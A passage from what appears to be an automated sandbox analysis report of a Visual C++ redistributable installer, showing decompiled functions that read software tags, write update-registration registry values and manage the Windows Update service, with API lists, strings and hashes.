                                                                          • String ID: "%ls"$"%ls" %s$@Met$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
                                                                          • API String ID: 155678114-407875378
                                                                          • Opcode ID: 3d2a972f3430d61cd254c882117d73d424ca3d0016b2040cf14b5c67fac93e1e
                                                                          • Instruction ID: 043ff4db845901893ab1466f0006cb9cb5cf4498ca896ef82b9aba52a590f8d3
                                                                          • Opcode Fuzzy Hash: 3d2a972f3430d61cd254c882117d73d424ca3d0016b2040cf14b5c67fac93e1e
                                                                          • Instruction Fuzzy Hash: 71518C72D0061ABBDF11AFA4CC82DEEBBB9FF04305F004169FA04B6121D775AE949B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001EBB2 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 173COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 57%
                                                                          			E0001EBB2(signed int _a4, intOrPtr* _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v20;
				intOrPtr* _t44;
				signed int _t48;
				signed int _t68;
				intOrPtr _t70;
				signed int _t74;
				void* _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr* _t79;
				intOrPtr* _t83;
				signed int _t85;
				signed int _t88;

				_t74 = 0;
				_v20 = 0;
				_t85 = 0;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				if(E00053803(_a4, L"SoftwareTag",  &_v20) >= 0) {
					_t44 = _v20;
					_t84 =  &_v16;
					_push( &_v16);
					_push(_t44);
					if( *((intOrPtr*)( *_t44 + 0x20))() >= 0) {
						_t77 = _v16;
						if(_t77 == 0) {
							L22:
							_t88 = _t74;
							 *_a12 = _t77;
							 *_a8 = _t85;
							_t85 = _t74;
						} else {
							_t85 = E000138D4(_t77 << 4, 1);
							if(_t85 != 0) {
								_t77 = _v16;
								_a4 = 0;
								if(_t77 == 0) {
									goto L22;
								} else {
									_t13 = _t85 + 8; // 0x8
									_t75 = _t13;
									while(1) {
										_t88 = E00053760(_t77, _v20,  &_v8, 0);
										if(_t88 < 0) {
											break;
										}
										_t16 = _t75 - 8; // 0x0
										_t88 = E000531C7(_v8, L"Filename", _t16);
										if(_t88 < 0) {
											_push("Failed to get @Filename.");
											goto L2;
										} else {
											_t18 = _t75 - 4; // 0x4
											_t88 = E000531C7(_v8, L"Regid", _t18);
											if(_t88 < 0) {
												_push("Failed to get @Regid.");
												goto L2;
											} else {
												_t88 = E000531C7(_v8, L"Path", _t75);
												if(_t88 < 0) {
													_push("Failed to get @Path.");
													goto L2;
												} else {
													_t88 = E000533C8(_v8,  &_v12);
													if(_t88 < 0) {
														_push("Failed to get SoftwareTag text.");
														goto L2;
													} else {
														_t24 = _t75 + 4; // 0xc
														_t88 = E00012436(_t84, _t24, _v12, 0, 0xfde9);
														if(_t88 < 0) {
															_push("Failed to convert SoftwareTag text to UTF-8");
															goto L2;
														} else {
															_t68 = _v12;
															if(_t68 != 0) {
																__imp__#6(_t68);
																_v12 = _v12 & 0x00000000;
															}
															_t83 = _v8;
															if(_t83 != 0) {
																 *((intOrPtr*)( *_t83 + 8))(_t83);
																_v8 = _v8 & 0x00000000;
															}
															_t75 = _t75 + 0x10;
															_t77 = _v16;
															_t70 = _a4 + 1;
															_a4 = _t70;
															if(_t70 < _t77) {
																continue;
															} else {
																_t74 = 0;
																goto L22;
															}
														}
													}
												}
											}
										}
										goto L23;
									}
									_push("Failed to get next node.");
									goto L2;
								}
							} else {
								_t88 = 0x8007000e;
								E000137D3(_t55, "registration.cpp", 0x40c, 0x8007000e);
								_push("Failed to allocate memory for software tag structs.");
								goto L2;
							}
						}
					} else {
						_push("Failed to get software tag count.");
						goto L2;
					}
				} else {
					_push("Failed to select software tag nodes.");
					L2:
					_push(_t88);
					E0005012F();
				}
				L23:
				_t48 = _v12;
				if(_t48 != 0) {
					__imp__#6(_t48);
				}
				_t78 = _v8;
				if(_t78 != 0) {
					 *((intOrPtr*)( *_t78 + 8))(_t78);
				}
				_t79 = _v20;
				if(_t79 != 0) {
					 *((intOrPtr*)( *_t79 + 8))(_t79);
				}
				if(_t85 != 0) {
					E00013999(_t85);
				}
				return _t88;
			}



















                                                                          0x0001ebbe
                                                                          0x0001ebc9
                                                                          0x0001ebcc
                                                                          0x0001ebce
                                                                          0x0001ebd1
                                                                          0x0001ebd4
                                                                          0x0001ebe0
                                                                          0x0001ebf4
                                                                          0x0001ebf7
                                                                          0x0001ebfa
                                                                          0x0001ebfb
                                                                          0x0001ec05
                                                                          0x0001ec0e
                                                                          0x0001ec13
                                                                          0x0001ed2a
                                                                          0x0001ed2d
                                                                          0x0001ed2f
                                                                          0x0001ed34
                                                                          0x0001ed36
                                                                          0x0001ec19
                                                                          0x0001ec24
                                                                          0x0001ec28
                                                                          0x0001ec46
                                                                          0x0001ec49
                                                                          0x0001ec4e
                                                                          0x00000000
                                                                          0x0001ec54
                                                                          0x0001ec54
                                                                          0x0001ec54
                                                                          0x0001ec57
                                                                          0x0001ec65
                                                                          0x0001ec69
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ec6f
                                                                          0x0001ec80
                                                                          0x0001ec84
                                                                          0x0001ed9d
                                                                          0x00000000
                                                                          0x0001ec8a
                                                                          0x0001ec8a
                                                                          0x0001ec9b
                                                                          0x0001ec9f
                                                                          0x0001ed93
                                                                          0x00000000
                                                                          0x0001eca5
                                                                          0x0001ecb3
                                                                          0x0001ecb7
                                                                          0x0001ed89
                                                                          0x00000000
                                                                          0x0001ecbd
                                                                          0x0001ecc9
                                                                          0x0001eccd
                                                                          0x0001ed7f
                                                                          0x00000000
                                                                          0x0001ecd3
                                                                          0x0001ecdd
                                                                          0x0001ece6
                                                                          0x0001ecea
                                                                          0x0001ed75
                                                                          0x00000000
                                                                          0x0001ecf0
                                                                          0x0001ecf0
                                                                          0x0001ecf5
                                                                          0x0001ecf8
                                                                          0x0001ecfe
                                                                          0x0001ecfe
                                                                          0x0001ed02
                                                                          0x0001ed07
                                                                          0x0001ed0c
                                                                          0x0001ed0f
                                                                          0x0001ed0f
                                                                          0x0001ed16
                                                                          0x0001ed19
                                                                          0x0001ed1c
                                                                          0x0001ed1d
                                                                          0x0001ed22
                                                                          0x00000000
                                                                          0x0001ed28
                                                                          0x0001ed28
                                                                          0x00000000
                                                                          0x0001ed28
                                                                          0x0001ed22
                                                                          0x0001ecea
                                                                          0x0001eccd
                                                                          0x0001ecb7
                                                                          0x0001ec9f
                                                                          0x00000000
                                                                          0x0001ec84
                                                                          0x0001eda7
                                                                          0x00000000
                                                                          0x0001eda7
                                                                          0x0001ec2a
                                                                          0x0001ec2a
                                                                          0x0001ec3a
                                                                          0x0001ec3f
                                                                          0x00000000
                                                                          0x0001ec3f
                                                                          0x0001ec28
                                                                          0x0001ec07
                                                                          0x0001ec07
                                                                          0x00000000
                                                                          0x0001ec07
                                                                          0x0001ebe2
                                                                          0x0001ebe2
                                                                          0x0001ebe7
                                                                          0x0001ebe7
                                                                          0x0001ebe8
                                                                          0x0001ebee
                                                                          0x0001ed38
                                                                          0x0001ed38
                                                                          0x0001ed3d
                                                                          0x0001ed40
                                                                          0x0001ed40
                                                                          0x0001ed46
                                                                          0x0001ed4b
                                                                          0x0001ed50
                                                                          0x0001ed50
                                                                          0x0001ed53
                                                                          0x0001ed58
                                                                          0x0001ed5d
                                                                          0x0001ed5d
                                                                          0x0001ed62
                                                                          0x0001ed65
                                                                          0x0001ed65
                                                                          0x0001ed72

                                                                          APIs
                                                                          • SysFreeString.OLEAUT32(?), ref: 0001ED40
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • SysFreeString.OLEAUT32(?), ref: 0001ECF8
                                                                          Strings
                                                                          • Filename, xrefs: 0001EC73
                                                                          • Failed to get next node., xrefs: 0001EDA7
                                                                          • Failed to allocate memory for software tag structs., xrefs: 0001EC3F
                                                                          • Failed to get @Regid., xrefs: 0001ED93
                                                                          • Path, xrefs: 0001ECA6
                                                                          • Failed to get software tag count., xrefs: 0001EC07
                                                                          • Regid, xrefs: 0001EC8E
                                                                          • Failed to get SoftwareTag text., xrefs: 0001ED7F
                                                                          • SoftwareTag, xrefs: 0001EBC1
                                                                          • registration.cpp, xrefs: 0001EC35
                                                                          • Failed to get @Path., xrefs: 0001ED89
                                                                          • Failed to convert SoftwareTag text to UTF-8, xrefs: 0001ED75
                                                                          • Failed to select software tag nodes., xrefs: 0001EBE2
                                                                          • Failed to get @Filename., xrefs: 0001ED9D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeHeapString$AllocateProcess
                                                                          • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$registration.cpp
                                                                          • API String ID: 336948655-1068704183
                                                                          • Opcode ID: bbabe2392e8ad8db74017f6ecdcacccc376246153b3483eda9b59665b70cf999
                                                                          • Instruction ID: c8b2425fc36fd2e633bb160446fe85963d97e8634a36122468241dc9f086bcb5
                                                                          • Opcode Fuzzy Hash: bbabe2392e8ad8db74017f6ecdcacccc376246153b3483eda9b59665b70cf999
                                                                          • Instruction Fuzzy Hash: 5851B135A05369ABDB259F94D891EEFBBA5AF04750F140169FD02EB241CB71DE808B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001F410 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 56%
                                                                          			E0001F410(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _t59;
				char* _t60;
				void* _t64;
				void* _t72;

				_t57 = __edx;
				_t54 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t59 = _a4;
				_t64 = E0001E7CD(__ecx, _t59,  &_v12);
				if(_t64 >= 0) {
					_t64 = E00050A88( *((intOrPtr*)(_t59 + 0x4c)), _v12, 0x20006,  &_v8);
					if(_t64 >= 0) {
						if(E00051392(__ecx, __edx, _v8, L"ThisVersionInstalled", "Y") >= 0) {
							if(E00051392(__ecx, __edx, _v8, L"PackageName",  *((intOrPtr*)(_t59 + 0x60))) >= 0) {
								if(E00051392(_t54, __edx, _v8, L"PackageVersion",  *((intOrPtr*)(_t59 + 0x64))) >= 0) {
									if(E00051392(_t54, __edx, _v8, L"Publisher",  *((intOrPtr*)(_t59 + 0x68))) >= 0) {
										_t40 =  *((intOrPtr*)(_t59 + 0xa4));
										if( *((intOrPtr*)(_t59 + 0xa4)) == 0) {
											L16:
											_t60 = L"ReleaseType";
											if(E00051392(_t54, _t57, _v8, _t60,  *((intOrPtr*)(_t59 + 0xb0))) >= 0) {
												_t61 = _a8;
												if(E0001EDB1(_t54, _t57, _v8, _a8, L"LogonUser", L"InstalledBy") >= 0) {
													if(E0001EDB1(_t54, _t57, _v8, _t61, L"Date", L"InstalledDate") >= 0) {
														_t72 = E0001EDB1(_t54, _t57, _v8, _t61, L"InstallerName", L"InstallerName");
														if(_t72 >= 0) {
															_t72 = E0001EDB1(_t54, _t57, _v8, _t61, L"InstallerVersion", L"InstallerVersion");
															if(_t72 < 0) {
																_push(L"InstallerVersion");
																goto L26;
															}
														} else {
															_push(L"InstallerName");
															goto L26;
														}
													} else {
														_push(L"InstalledDate");
														goto L26;
													}
												} else {
													_push(L"InstalledBy");
													goto L26;
												}
											} else {
												_push(_t60);
												goto L26;
											}
										} else {
											_t72 = E00051392(_t54, _t57, _v8, L"PublishingGroup", _t40);
											if(_t72 >= 0) {
												goto L16;
											} else {
												_push(L"PublishingGroup");
												goto L26;
											}
										}
									} else {
										_push(L"Publisher");
										goto L26;
									}
								} else {
									_push(L"PackageVersion");
									goto L26;
								}
							} else {
								_push(L"PackageName");
								goto L26;
							}
						} else {
							_push(L"ThisVersionInstalled");
							L26:
							_push("Failed to write %ls value.");
							_push(_t72);
							E0005012F();
						}
					} else {
						_push("Failed to create the key for update registration.");
						goto L2;
					}
				} else {
					_push("Failed to get the formatted key path for update registration.");
					L2:
					_push(_t64);
					E0005012F();
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
					_v8 = _v8 & 0x00000000;
				}
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				return _t72;
			}









                                                                          0x0001f410
                                                                          0x0001f410
                                                                          0x0001f413
                                                                          0x0001f414
                                                                          0x0001f415
                                                                          0x0001f41c
                                                                          0x0001f422
                                                                          0x0001f42c
                                                                          0x0001f430
                                                                          0x0001f458
                                                                          0x0001f45c
                                                                          0x0001f47b
                                                                          0x0001f49b
                                                                          0x0001f4bb
                                                                          0x0001f4db
                                                                          0x0001f4e7
                                                                          0x0001f4ef
                                                                          0x0001f50f
                                                                          0x0001f515
                                                                          0x0001f527
                                                                          0x0001f52c
                                                                          0x0001f546
                                                                          0x0001f566
                                                                          0x0001f57f
                                                                          0x0001f583
                                                                          0x0001f59c
                                                                          0x0001f5a0
                                                                          0x0001f5a2
                                                                          0x00000000
                                                                          0x0001f5a2
                                                                          0x0001f585
                                                                          0x0001f585
                                                                          0x00000000
                                                                          0x0001f585
                                                                          0x0001f568
                                                                          0x0001f568
                                                                          0x00000000
                                                                          0x0001f568
                                                                          0x0001f548
                                                                          0x0001f548
                                                                          0x00000000
                                                                          0x0001f548
                                                                          0x0001f529
                                                                          0x0001f529
                                                                          0x00000000
                                                                          0x0001f529
                                                                          0x0001f4f1
                                                                          0x0001f4ff
                                                                          0x0001f503
                                                                          0x00000000
                                                                          0x0001f505
                                                                          0x0001f505
                                                                          0x00000000
                                                                          0x0001f505
                                                                          0x0001f503
                                                                          0x0001f4dd
                                                                          0x0001f4dd
                                                                          0x00000000
                                                                          0x0001f4dd
                                                                          0x0001f4bd
                                                                          0x0001f4bd
                                                                          0x00000000
                                                                          0x0001f4bd
                                                                          0x0001f49d
                                                                          0x0001f49d
                                                                          0x00000000
                                                                          0x0001f49d
                                                                          0x0001f47d
                                                                          0x0001f47d
                                                                          0x0001f5a7
                                                                          0x0001f5a7
                                                                          0x0001f5ac
                                                                          0x0001f5ad
                                                                          0x0001f5b2
                                                                          0x0001f45e
                                                                          0x0001f45e
                                                                          0x00000000
                                                                          0x0001f45e
                                                                          0x0001f432
                                                                          0x0001f432
                                                                          0x0001f437
                                                                          0x0001f437
                                                                          0x0001f438
                                                                          0x0001f43e
                                                                          0x0001f5b9
                                                                          0x0001f5be
                                                                          0x0001f5c4
                                                                          0x0001f5c4
                                                                          0x0001f5cc
                                                                          0x0001f5d1
                                                                          0x0001f5d1
                                                                          0x0001f5dd

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00020348,InstallerVersion,InstallerVersion,00000000,00020348,InstallerName,InstallerName,00000000,00020348,Date,InstalledDate,00000000,00020348,LogonUser), ref: 0001F5BE
                                                                            • Part of subcall function 00051392: RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,0A79F685,00000000,0A79F685,000000FF,00000000,00000000,?,?,0001F1C2,00000000,6AE8FC75,00020006), ref: 000513C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValue
                                                                          • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                          • API String ID: 3132538880-2703781546
                                                                          • Opcode ID: cadd5bfdac0afacee3b079bc886b7da7cab0dc5ab325932df533323c17d2b32f
                                                                          • Instruction ID: c88d468486dec64937384e6b2230fe7e74e12b97aa80846b7307dc1e38375d46
                                                                          • Opcode Fuzzy Hash: cadd5bfdac0afacee3b079bc886b7da7cab0dc5ab325932df533323c17d2b32f
                                                                          • Instruction Fuzzy Hash: 7D419631A80E67BBDB225A50CC02EFF7A67AB11B11F114270FF01BB292D7619E949680
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003678F Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 150serviceCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 76%
                                                                          			E0003678F(intOrPtr _a4, void** _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v32;
				struct _SERVICE_STATUS _v36;
				char _v40;
				intOrPtr* _v44;
				void** _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t29;
				intOrPtr _t33;
				void* _t35;
				signed short _t48;
				signed short _t51;
				signed short _t54;
				void* _t58;
				signed int _t59;
				void* _t70;
				short* _t71;
				signed int _t81;

				_t23 =  *0x7a008; // 0xfbf51acb
				_v8 = _t23 ^ _t81;
				_t59 = 7;
				_v48 = _a8;
				_t71 = 0;
				_v44 = _a12;
				_v40 = 0;
				memset( &_v36, 0, _t59 << 2);
				_t29 = OpenSCManagerW(0, 0, 0xf003f);
				_v52 = _t29;
				if(_t29 != 0) {
					_t58 = OpenServiceW(_t29, L"wuauserv", 0x27);
					if(_t58 != 0) {
						if(QueryServiceStatus(_t58,  &_v36) != 0) {
							_t33 = _v32;
							if(_t33 != 1 && _a4 != 0) {
								_t71 = E000369A8(_t58, _t58);
								_t33 = _v32;
							}
							if(_t33 == 4) {
								L17:
								 *_v48 = _t58;
								_t58 = 0;
							} else {
								_t71 = E000557BF(0, _t58,  &_v40);
								if(_t71 >= 0) {
									if( *((intOrPtr*)(_v40 + 4)) != 4) {
										goto L17;
									} else {
										_t71 = E00036945(_t58, 3);
										if(_t71 >= 0) {
											 *_v44 = 1;
											goto L17;
										} else {
											_push("Failed to mark WU service to start on demand.");
											goto L2;
										}
									}
								} else {
									_push("Failed to read configuration for WU service.");
									goto L2;
								}
							}
						} else {
							_t48 = GetLastError();
							_t74 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
							_t71 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "msuengine.cpp", 0x1bf, _t71);
							_push("Failed to query status of WU service.");
							goto L2;
						}
					} else {
						_t51 = GetLastError();
						_t77 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
						_t71 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "msuengine.cpp", 0x1bb, _t71);
						_push("Failed to open WU service.");
						goto L2;
					}
				} else {
					_t54 = GetLastError();
					_t80 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
					_t71 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "msuengine.cpp", 0x1b8, _t71);
					_push("Failed to open service control manager.");
					L2:
					_push(_t71);
					E0005012F();
				}
				if(_v40 != 0) {
					E00013999(_v40);
				}
				_t70 = CloseServiceHandle;
				if(_t58 != 0) {
					CloseServiceHandle(_t58);
				}
				_t35 = _v52;
				if(_t35 != 0) {
					CloseServiceHandle(_t35);
				}
				return E0003DE36(_t58, _v8 ^ _t81, 0, _t70, _t71);
			}


























                                                                          0x00036795
                                                                          0x0003679c
                                                                          0x000367a9
                                                                          0x000367aa
                                                                          0x000367b3
                                                                          0x000367ba
                                                                          0x000367c1
                                                                          0x000367c5
                                                                          0x000367c8
                                                                          0x000367ce
                                                                          0x000367d3
                                                                          0x00036823
                                                                          0x00036827
                                                                          0x0003686b
                                                                          0x000368a5
                                                                          0x000368ad
                                                                          0x000368ba
                                                                          0x000368bc
                                                                          0x000368bc
                                                                          0x000368c2
                                                                          0x00036904
                                                                          0x00036907
                                                                          0x00036909
                                                                          0x000368c4
                                                                          0x000368ce
                                                                          0x000368d2
                                                                          0x000368e5
                                                                          0x00000000
                                                                          0x000368e7
                                                                          0x000368ef
                                                                          0x000368f3
                                                                          0x00036902
                                                                          0x00000000
                                                                          0x000368f5
                                                                          0x000368f5
                                                                          0x00000000
                                                                          0x000368f5
                                                                          0x000368f3
                                                                          0x000368d4
                                                                          0x000368d4
                                                                          0x00000000
                                                                          0x000368d4
                                                                          0x000368d2
                                                                          0x0003686d
                                                                          0x0003686d
                                                                          0x0003687e
                                                                          0x00036888
                                                                          0x00036896
                                                                          0x0003689b
                                                                          0x00000000
                                                                          0x0003689b
                                                                          0x00036829
                                                                          0x00036829
                                                                          0x0003683a
                                                                          0x00036844
                                                                          0x00036852
                                                                          0x00036857
                                                                          0x00000000
                                                                          0x00036857
                                                                          0x000367d5
                                                                          0x000367d5
                                                                          0x000367e6
                                                                          0x000367f0
                                                                          0x000367fe
                                                                          0x00036803
                                                                          0x00036808
                                                                          0x00036808
                                                                          0x00036809
                                                                          0x0003680f
                                                                          0x0003690f
                                                                          0x00036914
                                                                          0x00036914
                                                                          0x00036919
                                                                          0x00036921
                                                                          0x00036924
                                                                          0x00036924
                                                                          0x00036926
                                                                          0x0003692b
                                                                          0x0003692e
                                                                          0x0003692e
                                                                          0x00036942

                                                                          APIs
                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,00036CE1,?), ref: 000367C8
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00036CE1,?,?,?), ref: 000367D5
                                                                          • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00036CE1,?,?,?), ref: 0003681D
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00036CE1,?,?,?), ref: 00036829
                                                                          • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00036CE1,?,?,?), ref: 00036863
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00036CE1,?,?,?), ref: 0003686D
                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00036924
                                                                          • CloseServiceHandle.ADVAPI32(?), ref: 0003692E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                                          • String ID: @Met$Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuuser.cpp$wuauserv
                                                                          • API String ID: 971853308-1642282992
                                                                          • Opcode ID: a33338e81be9343d65ace41e1bb04cb2bacfb5633a841e9de3931021fca18279
                                                                          • Instruction ID: 22cac9cd8cd571950666ae957141c74a99b1fce54fb303e21632e20bd52dab3b
                                                                          • Opcode Fuzzy Hash: a33338e81be9343d65ace41e1bb04cb2bacfb5633a841e9de3931021fca18279
                                                                          • Instruction Fuzzy Hash: 7A419171F00314BBEB229BA98C45AAF76EDEF48751F118526FD05FB281DA36DC0086A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003C517 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E0003C517(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				intOrPtr _t121;
				intOrPtr _t176;
				intOrPtr* _t190;
				intOrPtr* _t197;
				intOrPtr _t198;
				intOrPtr _t203;
				signed int _t206;
				intOrPtr _t207;
				intOrPtr _t208;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				void* _t214;
				void* _t220;
				signed int _t223;
				intOrPtr* _t224;
				void* _t225;

				_t193 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t190 = _a24;
				_t121 = E000138D4( *(_t190 + 0x80) << 3, 1);
				_t212 = _a4;
				 *((intOrPtr*)(_t212 + 0x7c)) = _t121;
				if(_t121 != 0) {
					_t206 = 0;
					 *(_t212 + 0x80) =  *(_t190 + 0x80);
					_a4 = 0;
					if( *(_t190 + 0x80) <= 0) {
						L16:
						 *(_t212 + 0x14) =  *(_t212 + 0x14) & 0x00000000;
						 *((intOrPtr*)(_t212 + 0xa8)) = 1;
						 *((intOrPtr*)(_t212 + 0x8c)) =  *((intOrPtr*)(_t190 + 0x8c));
						 *((intOrPtr*)(_t212 + 0x40)) =  *((intOrPtr*)(_t190 + 0x40));
						 *((intOrPtr*)(_t212 + 0x44)) =  *((intOrPtr*)(_t190 + 0x44));
						 *((intOrPtr*)(_t212 + 0x28)) =  *((intOrPtr*)(_t190 + 0x28));
						 *((intOrPtr*)(_t212 + 0x2c)) =  *((intOrPtr*)(_t190 + 0x2c));
						 *((intOrPtr*)(_t212 + 0x30)) =  *((intOrPtr*)(_t190 + 0x30));
						 *((intOrPtr*)(_t212 + 0x34)) =  *((intOrPtr*)(_t190 + 0x34));
						 *((intOrPtr*)(_t212 + 0x1c)) =  *((intOrPtr*)(_t190 + 0x1c));
						if(E000121A5(_t212,  *_t190, 0) >= 0) {
							_t97 = _t212 + 0x24; // 0x124
							if(E000121A5(_t97,  *((intOrPtr*)(_t190 + 0x24)), 0) >= 0) {
								 *((intOrPtr*)(_t212 + 0xb0)) =  *((intOrPtr*)(_t190 + 0xb0));
								if(E00027C29(_t193,  &_v8,  *_a8,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(_a8 + 8)),  *((intOrPtr*)(_a8 + 0x1c)), 1, _a16, _a20, _a12,  *((intOrPtr*)(_t135 + 0xc))) >= 0) {
									_t109 = _t212 + 0x94; // 0x194
									if(E000121A5(_t109, _v8, 0) >= 0) {
										_t112 = _t212 + 0x98; // 0x198
										_t220 = E000121A5(_t112, _v8, 0);
										if(_t220 >= 0) {
											_t114 = _t212 + 0x9c; // 0x19c
											 *((intOrPtr*)(_t212 + 0xac)) = 1;
											_t220 = E000121A5(_t114, _v8, 0);
											if(_t220 >= 0) {
												 *((intOrPtr*)(_t212 + 0x18)) = 1;
											} else {
												_push("Failed to copy uninstall arguments for passthrough bundle package");
												goto L23;
											}
										} else {
											_push("Failed to copy related arguments for passthrough bundle package");
											goto L23;
										}
									} else {
										_push("Failed to copy install arguments for passthrough bundle package");
										goto L23;
									}
								} else {
									_push("Failed to recreate command-line arguments.");
									goto L23;
								}
							} else {
								_push("Failed to copy cache id for passthrough pseudo bundle.");
								goto L23;
							}
						} else {
							_push("Failed to copy key for passthrough pseudo bundle.");
							goto L23;
						}
					} else {
						while(1) {
							_t223 = _t206 << 3;
							_a24 =  *((intOrPtr*)(_t190 + 0x7c)) + _t223;
							 *((intOrPtr*)(_t223 +  *((intOrPtr*)(_t212 + 0x7c)))) = E000138D4(0x58, 1);
							_t150 =  *((intOrPtr*)(_t212 + 0x7c));
							_t207 =  *((intOrPtr*)(_t223 +  *((intOrPtr*)(_t212 + 0x7c))));
							if(_t207 == 0) {
								break;
							}
							_t197 = _a24;
							 *((intOrPtr*)(_t207 + 4)) =  *((intOrPtr*)( *_t197 + 4));
							_t198 =  *_t197;
